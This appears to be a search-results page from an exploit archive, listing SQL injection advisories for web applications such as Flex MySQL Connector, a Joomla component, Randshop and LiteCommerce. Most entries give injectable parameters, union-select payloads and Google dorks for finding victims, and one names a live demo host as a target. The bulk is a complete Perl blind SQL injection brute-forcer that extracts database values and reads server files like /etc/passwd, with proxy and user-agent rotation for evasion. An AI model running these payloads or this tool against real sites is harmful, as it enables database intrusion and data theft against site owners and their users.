my SQL us
Search result for 'my SQL us'
(0.0132429599762 seconds)
DungPQ/Flex MySQL Connector SQL Injection ( na)
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$ Flex MySQL Connector Remote SQL Execution Exploit $$$ $$$ $$$ $$$ || License: Commercial $$$ $$$ || Language: English $$$ $$$ Flex MySQL Connector || Cost: $45.00 $$$ $$$ || Platform: Flash Player 9 | Flash Player 10 $$$ $$$ || Demo: http://flexappsstore.com/flexapps/demo/mysql/ $$$ $$$ $$$ $$$ || Name: ~Fyodor (aka DungPQ) $$$ $$$ Credit || Email: quangdung181188[at]gmail.com $$$ $$$ || Location: Hanoi, Vietnam $$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ [$] Vulnz Description : Flex MySQL Connector is a Flex Component from FlexAppsStore, which allow run SQL from ActionScript via PHP backend (Flash <=> PHP <=> MySQL). But anybody can modify the SQL command in Request packet and send to PHP backend, it means anybody can query SQL commands to victim's MySQL server => OMG ! [$] Exploitz : Send Example SQL command to MySQL at http://flexappsstore.com/flexapps/demo/mysql/ ----------------------------------------------------------------------------------- > Dest.IP = 66.147.242.177 > Dest.PORT = 80 ---[Request BOF]--- POST /flexapps/flexmysqlconn.php?irand=0.2112374654971063 HTTP/1.1 User-Agent: Opera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.10 Host: www.flexappsstore.com Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 Accept-Language: en-US,en;q=0.9 Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0 Referer: http://flexappsstore.com/flexapps/demo/mysql/index.swf Connection: Keep-Alive, TE TE: deflate, gzip, chunked, identity, trailers Content-Length: 89 Content-type: application/x-www-form-urlencoded fas%5Fdb=flexapps%5Fdemxo&fas%5Fsql=SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig ---[Request EOF]--- (Oh yeah, SQL command is SELECT%20count%28%2A%29%20as%20cnt1%20FROM%20tbl%5Fbigbig => SELECT count(*) as cnt1 FROM tbl_bigbig) [$] PS: I don't give full PoC sourcecode. You can make your PoC by PHP (using fsockopen(), cUrl, ...) but if you want, contact me. ^_^ [$] ~Fyodor - The Still Lake
Flex MySQL Connector suffers from a remote SQL injection vulnerability.
Snakespc/Joomla SQL Report Blind SQL Injection ( na)
==============================================================================
[»]Joomla Component user_id com_sqlreport Blind SQL Injection Vulnerability
==============================================================================
[»] Script: [Joomla]
[»] Language: [ PHP ]
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
[»] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]
[»] Dork:inurl:"com_sqlreport"
[»] Demo:http://fullysms.com/fullysms/administrator/components/com_sqlreport/ajax/print.php?table=fsms_coverage&fields=country|idd|carrier|credit&filters=&username=&user_id=0
[»]
###########################################################################
===[ Exploit ]===POC Blind Joomla (user_id) com_sqlreport >>>>Note::Placés dans un dossier C:\Perl\bin\snakespc.pl
###########################################################################
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
use IO::Handle;
use strict;
$| = 1;
###############################################################################
my $default_debug = 0;
my $default_length = 32;
my $default_method = "GET";
my $default_time = 0;
my $version = "1.1";
my $default_useragent = "bsqlbf $version";
my $default_dict = "dict.txt";
my $default_sql = "version()";
###############################################################################
$| = 1;
my ($args, $abc, $solution);
my ($string, $char, @dic);
my (%vars, @varsb);
my ($lastvar, $lastval);
my ($scheme, $authority, $path, $query, $fragment);
my $hits = 0;
my $usedict = 0;
my $amatch = 0;
my ($ua,$req);
###############################################################################
#
#Define GetOpt:
my ($url, $sql, $time, $rtime, $match, $uagent, $charset, $debug);
my ($proxy, $proxy_user, $proxy_pass,$rproxy, $ruagent);
my ($dict, $start, $length, $method, $cookie,$blind);
my ($help, $bincharset, $get, $nodict);
my $options = GetOptions (
'help!' => \$help,
'url=s' => \$url,
'get=s' => \$get,
'sql=s' => \$sql,
'blind=s' => \$blind,
'match=s' => \$match,
'charset=s' => \$charset,
'start=s' => \$start,
'length=s' => \$length,
'dict=s' => \$dict,
'method=s' => \$method,
'uagent=s' => \$uagent,
'ruagent=s' => \$ruagent,
'cookie=s' => \$cookie,
'proxy=s' => \$proxy,
'proxy_user=s' => \$proxy_user,
'proxy_pass=s' => \$proxy_pass,
'rproxy=s' => \$rproxy,
'debug!' => \$debug,
'rtime=s' => \$rtime,
'time=i' => \$time );
&help unless ($url);
&help if $help eq 1;
#########################################################################
# Default Options.
$abc = charset();
$uagent ||= $default_useragent;
$debug ||= $default_debug;
$length ||= $default_length;
$solution ||= $start;
$method ||= $default_method;
$sql ||= $default_sql;
$time ||= $default_time;
&createlwp();
&parseurl();
if ( ! defined($blind)) {
$lastvar = $varsb[$#varsb];
$lastval = $vars{$lastvar};
} else {
$lastvar = $blind;
$lastval = $vars{$blind};
}
if (defined($cookie)) { &cookie() }
if (!$match) {
print "\nTrying to find a match string...\n" if $debug == 1;
$amatch = "1";
&auto_match();
}
&banner();
&httpintro();
if ( ! $get) { &sqlget() } else { &fileget() }
sub fileget {
#ord(MID(compress(load_file(0xfilename)),1,1))
$get =~ m,.*/(.*),;
my $lget = $1;
my $rsize = $start + 1;
if (-e "$lget" && ! $start) {
$rsize = -s "$lget";
print "Error: file ./$lget exists.\n";
print "You can erase or resume it with: -start $rsize\n";
exit 1
}
my ($fstr,$i);
my $fsize = "";
$fstr = unpack("H*","$get");
# GET size of file.
$abc = "0123456789";
for ($i=1;$i<=15;$i++) {
my $furl;
my $find = 0;
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " and mid(length(load_file(0x$fstr)),$i,1)=char($char)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
my $asc=chr($char);
$fsize .= $asc;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
last if $find == 0;
}
if ($fsize < "1") { print "Error: file not found, no permissions or ... who knows\n"; exit 1 }
# starting ..
$length = "$fsize bytes";
$abc = "getfile [256]";
$sql = "load_file($get)";
&bsqlintro();
# Get file
open FILE, ">>$lget";
FILE->autoflush(1);
print "\n--- BEGIN ---\n";
my ($i,$b,$fcontent);
$rsize = 1 if $rsize < 1;
for ($i=$rsize;$i<=$fsize+1;$i++) {
my $find = 0;
my ($furl, $b_start, $b_end, $z);
for ($z=0;$z<272;$z+=16) {
my $zz = $z + 16;
$string = " and ord(mid(load_file(0x$fstr),$i,1))>=$z and ord(mid(load_file(0x$fstr),$i,1))<=$zz";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
$b_start = $z;
$b_end = $z + 16;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
print "$fcontent";
for ($b=$b_start;$b<=$b_end;$b++) {
$find = 0;
$string = " and mid(load_file(0x$fstr),$i,1)=char($b)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
$fcontent = pack("C*","$b");
print FILE "$fcontent";
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
}
print "\n--- END ---\n";
close FILE;
$solution = "success";
}
sub sqlget {
&bsqlintro();
$dict ||= $default_dict;
open DICT,"$dict"; @dic=<DICT>; close DICT;
my $i;
$nodict = 0;
for ($i=length($start)+1;$i<=$length;$i++) {
my $furl;
my $find = 0;
$abc = charset();
&bsqlintro if $debug == 1;
print "\r trying: $solution ";
foreach (split/ */,$abc) {
$find = 0;
$char = ord();
$string = " AND MID($sql,$i,1)=CHAR($char)";
if (lc($method) eq "post") {
$vars{$lastvar} = $lastval . $string;
}
print "\x08$_";
$furl = $url;
$furl =~ s/($lastvar=$lastval)/$1$string/;
&createlwp if $rproxy || $ruagent;
my $html=fetch("$furl");
$hits++;
foreach (split(/\n/,$html)) {
if (/\Q$match\E/) {
my $asc=chr($char);
$solution .= $asc;
$find = 1;
}
last if $find == 1;
}
last if $find == 1;
}
if ($usedict ne 0 && $find eq 0) { $nodict=1; $i--; }
if ($find eq "0" && $usedict eq "0") { last; };
}
}
&result();
#########################################################################
sub httpintro {
my ($strcookie, $strproxy, $struagent, $strtime, $i);
print "--[ http options ]"; print "-"x62; print "\n";
printf ("%12s %-8s %11s %-20s\n","schema:",$scheme,"host:",$authority);
if ($ruagent) { $struagent="rnd.file:$ruagent" } else { $struagent = $uagent }
printf ("%12s %-8s %11s %-20s\n","method:",uc($method),"useragent:",$struagent);
printf ("%12s %-50s\n","path:", $path);
foreach (keys %vars) {
$i++;
printf ("%12s %-15s = %-40s\n","arg[$i]:",$_,$vars{$_});
}
if (! $cookie) { $strcookie="(null)" } else { $strcookie = $cookie; }
printf ("%12s %-50s\n","cookies:",$strcookie);
if (! $proxy && !$rproxy) { $strproxy="(null)" } else { $strproxy = $proxy; }
if ($rproxy) { $strproxy = "rnd.file:$rproxy" }
printf ("%12s %-50s\n","proxy_host:",$strproxy);
if (! $proxy_user) { $strproxy="(null)" } else { $strproxy = $proxy_user; }
# timing
if (! $time && !$rtime) { $strtime="0sec (default)" }
if ( $time == 0) { $strtime="0 sec (default)" }
if ( $time == 1) { $strtime="15 secs" }
if ( $time == 2) { $strtime="5 mins" }
if ($rtime) { $strtime = "rnd.time:$rtime" }
printf ("%12s %-50s\n","time:",$strtime);
}
sub bsqlintro {
my ($strstart, $strblind, $strlen, $strmatch, $strsql);
print "\n--[ blind sql injection options ]"; print "-"x47; print "\n";
if (! $start) { $strstart = "(null)"; } else { $strstart = $start; }
if (! $blind) { $strblind = "(last) $lastvar"; } else { $strblind = $blind; }
printf ("%12s %-15s %11s %-20s\n","blind:",$strblind,"start:",$strstart);
if ($length eq $default_length) { $strlen = "$length (default)" } else { $strlen = $length; }
if ($sql eq $default_sql) { $strsql = "$sql (default)"; } else { $strsql = $sql; }
printf ("%12s %-15s %11s %-20s\n","length:",$strlen,"sql:",$strsql);
printf ("%12s %-50s\n","charset:",$abc);
if ($amatch eq 1) { $strmatch = "auto match:" } else { $strmatch = "match:"; }
#printf ("%12s %-60s\n","$strmatch",$match);
print " $strmatch $match\n";
print "-"x80; print "\n\n";
}
#########################################################################
sub createlwp {
my $proxyc;
&getproxy;
&getuagent if $ruagent;
LWP::Debug::level('+') if $debug gt 3;
$ua = new LWP::UserAgent(
cookie_jar=> { file => "$$.cookie" });
$ua->agent("$uagent");
if (defined($proxy_user) && defined($proxy_pass)) {
my ($pscheme, $pauthority, $ppath, $pquery, $pfragment) =
$proxy =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
$proxyc = $pscheme."://".$proxy_user.":".$proxy_pass."@".$pauthority;
} else { $proxyc = $proxy; }
$ua->proxy(['http'] => $proxyc) if $proxy;
undef $proxy if $rproxy;
undef $uagent if $ruagent;
}
sub cookie {
# Cookies check
if ($cookie || $cookie =~ /; /) {
foreach my $c (split /;/, $cookie) {
my ($a,$b) = split /=/, $c;
if ( ! $a || ! $b ) { die "Wrong cookie value. Use -h for help\n"; }
}
}
}
sub parseurl {
###############################################################################
# Official Regexp to parse URI. Thank you somebody.
($scheme, $authority, $path, $query, $fragment) =
$url =~ m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
# Parse args of URI into %vars and @varsb.
foreach my $varval (split /&/, $query) {
my ($var, $val) = split /=/, $varval;
$vars{$var} = $val;
push(@varsb, $var);
}
}
# Define CHARSET to use. Dictionary /// (TODO: fix ugly code)
sub charset {
if ($hits ne 0 && $nodict eq 0) {
my (%tmp,@b,$foo); undef %tmp; undef @b; undef $abc;
foreach my $line (@dic) {
chomp $line;
if ($line =~ /\Q$solution\E/ && $line !~ /^#/) {
$foo = $line; $foo =~ s/\Q$solution\E//;
foreach ((split/ */,$foo)) {
if ($tmp{$_} ne "1" ) {
$tmp{$_} = "1"; push (@b,$_);
}
}
}
}
if ($#b >= 0) {
foreach my $c (@b) { $abc .=$c;}
$usedict = $abc;
print "\nUsing a dictionary with this charset: $abc\n" if $debug == 1;
} else {
$abc = chardefault()
}
} else {
$abc = chardefault()
}
return $abc;
}
sub chardefault {
my $tmp;
$abc = $charset;
if (lc($charset) eq "md5") {
$abc = "abcdef0123456789\$.";
} elsif (lc($charset) eq "num") {
$abc = "0123456789";
} elsif (lc($charset) eq "all" || ! $charset) {
$abc = "abcdefghijklmnopqrstuvwxyz0123456789\$.:-_()[]{}º@=/\\|#?¿&·!<>ñÑ";
}
# If a dictionary has been used before, remove chars from current charset
if ($usedict ne 0) {
foreach (split(/ */, $usedict)) {
$abc =~ s/$_//;
}
}
$usedict = 0;
return $abc;
}
sub auto_match {
$match = fmatch("$url");
}
#########################################################################
# Show options at running:
sub banner {
print "\n //com_sqlreport Blind SQL injection brute force.\n";
print " // super_cristal\@hotmail.com / http://www.sec-war.com\n\n";
}
#########################################################################
# Get differences in HTML
sub fmatch {
my ($ok,$rtrn);
my ($furla, $furlb) = ($_[0], $_[0]);
my ($html_a, $html_b);
if (lc($method) eq "get") {
$furla =~ s/($lastvar=$lastval)/$1 AND 1=1/;
$furlb =~ s/($lastvar=$lastval)/$1 AND 1=0/;
$html_a = fetch("$furla");
$html_b = fetch("$furlb");
} elsif (lc($method) eq "post") {
$vars{$lastvar} = $lastval . " AND 1=1";
$html_a = fetch("$furla");
$vars{$lastvar} = $lastval . " AND 1=0";
$html_b = fetch("$furla");
$vars{$lastvar} = $lastval;
}
my @h_a = split(/\n/,$html_a);
my @h_b = split(/\n/,$html_b);
foreach my $a (@h_a) {
$ok = 0;
if ($a =~ /\w/) {
foreach (@h_b) {
if ($a eq $_) {$ok = 1; }
}
} else { $ok = 1; }
$rtrn = $a;
last if $ok ne 1;
}
return $rtrn;
}
#########################################################################
# Fetch HTML from WWW
sub fetch {
my $secs;
if ($time == 0) { $secs = 0 }
elsif ($time == 1) { $secs = 15 }
elsif ($time == 2) { $secs = 300 }
if ($rtime =~ /\d*-\d*/ && $time == 0) {
my ($l,$p) = $rtime =~ m/(\d+-\d+)/;
srand; $secs = int(rand($p-$l+1))+$l;
} elsif ($rtime =~ /\d*-\d*/ && $time != 0) {
print "You can't run with -time and -rtime. See -help.\n";
exit 1;
}
sleep $secs;
my $res;
if (lc($method) eq "get") {
my $fetch = $_[0];
if ($cookie) {
$res = $ua->get("$fetch", Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->get("$fetch");
}
} elsif (lc($method) eq "post") {
my($s, $a, $p, $q, $f) =
$url=~m|^(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?|;
my $fetch = "$s://$a".$p;
if ($cookie) {
$res = $ua->post("$fetch",\%vars, Cookie => "$cookie");
} elsif (!$cookie) {
$res = $ua->post("$fetch",\%vars);
}
} else {
die "Wrong httpd method. Use -h for help\n";
}
my $html = $res->content();
return $html;
}
sub getproxy {
if ($rproxy && $proxy !~ /http/) {
my @lproxy;
open PROXY, $rproxy or die "Can't open file: $rproxy\n";
while(<PROXY>) { push(@lproxy,$_) if ! /^#/ }
close PROXY;
srand; my $ind = rand @lproxy;
$proxy = $lproxy[$ind];
} elsif ($rproxy && $proxy =~ /http/) {
print "You can't run with -proxy and -rproxy. See -help.\n";
exit 1;
}
}
sub getuagent {
my @uproxy;
open UAGENT, $ruagent or die "Can't open file: $ruagent\n";
while(<UAGENT>) { push(@uproxy,$_) if ! /^#/ }
close UAGENT;
srand; my $ind = rand @uproxy;
$uagent = $uproxy[$ind];
chop($uagent);
}
sub result {
print "\r results: \n" .
" $sql = $solution\n" if length($solution) > 0;
print " total hits: $hits\n";
}
sub help {
&banner();
print " usage: $0 <-url http://www.host.com/path/script.php?foo=bar> [options]\n";
print "\n options:\n";
print " -sql:\t\tvalid SQL syntax to get; connection_id(), database(),\n";
print "\t\tsystem_user(), session_user(), current_user(), last_insert_id(),\n";
print "\t\tuser() or all data available in the requested query, for\n";
print "\t\texample: user.password. Default: version()\n";
print " -blind:\tparameter to inject sql. Default is last value of url\n";
print " -match:\tstring to match in valid query, Default is try to get auto\n";
print " -charset:\tcharset to use. Default is all. Others charsets supported:\n";
print " \tall:\tabcdefghijklmnopqrstuvwxyz0123456789\$.-_()[]{}º@=/\\|#?¿&·!<>ñÑ\n";
print " \tnum:\t0123456789\n";
print " \tmd5:\tabcdef0123456789\$\n";
print " \tcustom:\tyour custom charset, for example: \"abc0123\"\n";
print " -start:\tif you know the beginning of the string, use it.\n";
print " -length:\tmaximum length of value. Default is $default_length.\n";
print " -dict:\t\tuse dictionary for improve speed. Default is dict.txt\n";
print " -time:\t\ttimer options:\n";
print " \t0:\tdont wait. Default option.\n";
print " \t1:\twait 15 seconds\n";
print " \t2:\twait 5 minutes\n";
print " -rtime:\twait random seconds, for example: \"10-20\".\n";
print " -method:\thttp method to use; get or post. Default is $default_method.\n";
print " -uagent:\thttp UserAgent header to use. Default is $default_useragent\n";
print " -ruagent:\tfile with random http UserAgent header to use.\n";
print " -cookie:\thttp cookie header to use\n";
print " -rproxy:\tuse random http proxy from file list.\n";
print " -proxy:\tuse proxy http. Syntax: -proxy=http://proxy:port/\n";
print " -proxy_user:\tproxy http user\n";
print " -proxy_pass:\tproxy http password\n";
print "\n examples:\n bash# $0 -url http://www.somehost.com/blah.php?u=5 -blind u -sql \"user()\"\n";
print " bash# $0 -url http://www.buggy.com/bug.php?r=514&p=3 -get \"/etc/passwd\"\n";
exit(1);
}
The Joomla SQL Report component suffers from a remote blind SQL injection vulnerability.
Hussin X/PHP-MySQL-Quiz SQL Injection ( na)
# PHP-MySQL-Quiz SQL Injection Vulnerability # # Author: Hussin X # Home : www.iq-ty.com<http://www.iq-ty.com> # email: darkangel_g85[at]Yahoo[DoT]com ########################################################## # HomE script : http://www.widgetmonkey.com/ # Download : http://www.getfreesofts.com/script_download.php?id=18744&id_1=881 # DorK : inurl:quizinfo.php Exploit: http://www.site.com/Script/editquiz.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8-- IQ-SecuritY FoRuM
PHP-MySQL-Quiz suffers from a remote SQL injection vulnerability.
Liz0ziM/randshopSQL.txt ( na)
Randshop all versiyon Sql İnjection Website:http://www.randshop.com Demo:http://www.randshop.com/demoshop/ ------------------------------------------------------------------- Credit:Liz0ziM & wannacut Mail:Liz0@bsdmail.com www.biyo.tk ------------------------------------------------------------------- exploit : http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL] http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL] -------------------------------------------------------------------------------- eg: http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21' -------------------------------------------------------------------- Google:intext:"software 2004-2005 by randshop" http://www.blogcu.com/Liz0ziM/112800/ http://biyo.5gigs.com/randshop.txt
Randshop is susceptible to SQL injection attacks.
Breeeeh/icgSQL.txt ( na)
================================ By: Breeeeh Breeeeh@hotmail.com example:- /politika/naslovna.phtml?akcija=vijest&id=[SQL Injection]
Internet Crna Gora is susceptible to a SQL injection flaw.
benjamin moss/evolveSQL.txt ( na)
vendor site:http://www.lynxinternet.com/ product:Evolve Merchant bug:injection sql risk:medium injection sql (get) : http://site.com/viewcart.asp?zoneid='[sql] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com
Evolve Merchant suffers from a SQL injection vulnerability.
benjamin moss/abarcarSQL.txt ( na)
software:Abarcar product:Realty Portal vendor site : http://www.abarcar.com/ risk : medium /newsdetails.php?neid=[sql] /slistl.php?slid=[sql] /content.php?cat=[sql] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com
The Abarcar Realty Portal is susceptible to SQL injection attacks.
laurent gaffie/fishcart-sql.txt ( na)
vendor site: http://fishcart.org/ product :fish cart bug:injection sql risk : medium injection sql : /display.php?cartid=200701210157208&zid=1&lid=1&olimit=5&cat=&key1=&nlst=y&olst='[sql] ( change the cartid value with yours ) laurent gaffie http://s-a-p.ca/ contact: saps.audit@gmail.com
Fish Cart is susceptible to SQL injection attacks.
Sw33t h4cK3r/saphpshowcat-sql.txt ( na)
Discovery by :- Sw33t h4cK3r powered by : saphp ---------------------------- Exploit : http://Example.com/story/showcat.php?forumid=[SQL]
Saphp suffers from a SQL injection vulnerability.
/dependet-sql.txt ( na)
_________________________ A R I A - S E C U R I T Y _________________________ Dependet Forums (Username Field) RemotE SQL Injection DORK: Powered by: Dependent Forums v1.02 Insert Your SQL Injection Code into the Username field. For Example ' union select * from members where member=1 Credits: Aria-Security Team http://aria-security.net http://outlaw.aria-security.info
Dependet Forums suffers from a SQL injection vulnerability.
GeFORC3/ohesa-sql.txt ( na)
Ohesa Emlak Portalý SQL Injection Vulnerability #Software: Ohesa Emlak Portalý #download: not free(300 $) sale: http://www.aspindir.com/goster/5178 #demo: http://www.ohesa.com.tr/web/emlak/www/ #Found By: GeFORC3 (G3 #Example & Exploit: http://www.site.com/script_path/satilik.asp?Kategori=[SQL] http://www.site.com/script_path/detay.asp?Emlak=[SQL] WwW.GeFORC3.Org | WwW.HeykirBlog.Com | WwW.NetKaBus.Com
Ohesa Emlak Portal is susceptible to a SQL injection vulnerability.
Silitix/calendarSQL.txt ( na)
[P]roduit : Calendar
Provided by Codewalkers
[S]ite officiel : http://Calendar.codewalkers.com
[V]ulnérabilité : SQL Injection
[E]xploitation : /calendar.php?display=event&id=[SQL]
[C]rédit : Silitix - www.Silitix.com
[A]vis de sécurité original : www.Silitix.com/calendar-cws.php
[G]reetz : Simo64 / MSRT / VeNoM630 / CrAsH_oVeR_rIdE ... :)
Calendar from Codewalkers is susceptible to a SQL injection flaw.
Diabolic Crab/litecommerceSQL.txt ( na)
This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Dcrab 's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/ Get Dcrab's Services to audit your Web servers, scripts, networks, etc. = Learn more at http://www.digitalparadox.org/services.ah Severity: High Title: LiteCommerce Sql injection and reveling errors vulnerability Date: 07/04/2005 Vendor: LiteCommerce Vendor Website: http://www.litecommerce.com Summary: LiteCommerce Sql injection and reveling errors vulnerability Proof of Concept Exploits:=20 http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_SCRIPT_EX= POSURE http://localhost/test/cart.php?target=3Dcategory&category_id=3D'SQL_INJEC= TION SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT = category_id,image_width,image_height,name,description,meta_tags,enable = d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t = ype FROM xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY = order_by, name This reveals coloumn, table information thus is very high risk and easy = to exploit http://localhost/test/cart.php?target=3Dproduct&product_id=3D'SQL_INJECTI= ON&category_id=3D246 SQL INJECTION 1064: You have an error in your SQL syntax. Check the manual that = corresponds to your MySQL server version for the right syntax to use = near 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT = inventory_id,amount,low_avail_limit,enabled,order_by FROM = xlite_inventories WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1 Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), = mysql_real_escape_string() and other functions for input validation = before passing user input to the mysql database, or before echoing data = on the screen, would solve these problems. Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah Author:=20 These vulnerabilties have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for = my soon to come out book on Secure coding with php. ------=_NextPart_000_0005_01C53B05.B7FB4460 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=3DContent-Type content=3D"text/html; = charset=3Diso-8859-1"> <META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR> <STYLE></STYLE> </HEAD> <BODY bgColor=3D#ffffff> <DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc = Security Group]=20 <A = href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><= BR>[dP=20 Security] <A=20 href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>= </DIV> <DIV>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web = servers,=20 scripts, networks, etc. Learn more at <A=20 href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara= dox.org/services.ah</A></FONT></DIV> <DIV>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: LiteCommerce = Sql injection=20 and reveling errors vulnerability<BR>Date: 07/04/2005</FONT></DIV> <DIV>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>Vendor: LiteCommerce<BR>Vendor Website: = <A=20 href=3D"http://www.litecommerce.com">http://www.litecommerce.com</A><BR>S= ummary:=20 LiteCommerce Sql injection and reveling errors = vulnerability</FONT></DIV> <DIV>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: = </FONT></DIV> <DIV>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2><A=20 href=3D"http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOSUREPHP_S= CRIPT_EXPOSURE">http://localhost/test/cart.php?target=3D'PHP_SCRIPT_EXPOS= UREPHP_SCRIPT_EXPOSURE</A></FONT></DIV> <DIV>&nbsp;</DIV><FONT face=3DArial size=3D2> <DIV><BR><A=20 href=3D"http://localhost/test/cart.php?target=3Dcategory&category_id=3D= 'SQL_INJECTION">http://localhost/test/cart.php?target=3Dcategory&cate= gory_id=3D'SQL_INJECTION</A><BR>SQL=20 INJECTION</DIV> <DIV>&nbsp;</DIV> <DIV>1064: You have an error in your SQL syntax. Check the manual that=20 corresponds to your MySQL server version for the right syntax to use = near=20 'SQL_INJECTION' AND 1 ORDER BY order_by, name' at line 1 in SELECT=20 category_id,image_width,image_height,name,description,meta_tags,enable=20 d,views_stats,order_by,membership,threshold_bestsellers,parent,image_t = ype FROM=20 xlite_categories WHERE parent=3D''SQL_INJECTION' AND 1 ORDER BY = order_by,=20 name<BR>This reveals coloumn, table information thus is very high risk = and easy=20 to exploit</DIV> <DIV>&nbsp;</DIV> <DIV><BR><A=20 href=3D"http://localhost/test/cart.php?target=3Dproduct&product_id=3D= 'SQL_INJECTION&category_id=3D246">http://localhost/test/cart.php?targ= et=3Dproduct&product_id=3D'SQL_INJECTION&category_id=3D246</A><BR= >SQL=20 INJECTION<BR>&nbsp;1064: You have an error in your SQL syntax. Check the = manual=20 that corresponds to your MySQL server version for the right syntax to = use near=20 'SQL_INJECTION' AND enabled=3D1' at line 1 in SELECT=20 inventory_id,amount,low_avail_limit,enabled,order_by FROM = xlite_inventories=20 WHERE inventory_id=3D''SQL_INJECTION' AND enabled=3D1</DIV> <DIV>&nbsp;</DIV> <DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20 mysql_escape_string(), mysql_real_escape_string() and other functions = for input=20 validation before passing user input to the mysql database, or before = echoing=20 data on the screen, would solve these problems.</DIV> <DIV>&nbsp;</DIV> <DIV>Keep your self updated, Rss feed at: <A=20 href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a= h</A></DIV> <DIV>&nbsp;</DIV> <DIV>Author: <BR>These vulnerabilties have been found and released by = Diabolic=20 Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel = free to=20 contact me regarding these vulnerabilities. You can find me at, <A=20 href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> = or <A=20 href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. = Lookout for my=20 soon to come out book on Secure coding with php.</DIV> <DIV>&nbsp;</DIV> <DIV></FONT>&nbsp;</DIV> <DIV><FONT face=3DArial size=3D2></FONT>&nbsp;</DIV></BODY></HTML> ------=_NextPart_000_0005_01C53B05.B7FB4460--
LiteCommerce is susceptible to SQL injection attacks.
GeFORC3/netkamp-sql.txt ( na)
Netkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability
#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )
#Exploit & example :
-----------------------------------------------------------------------
#XSS:
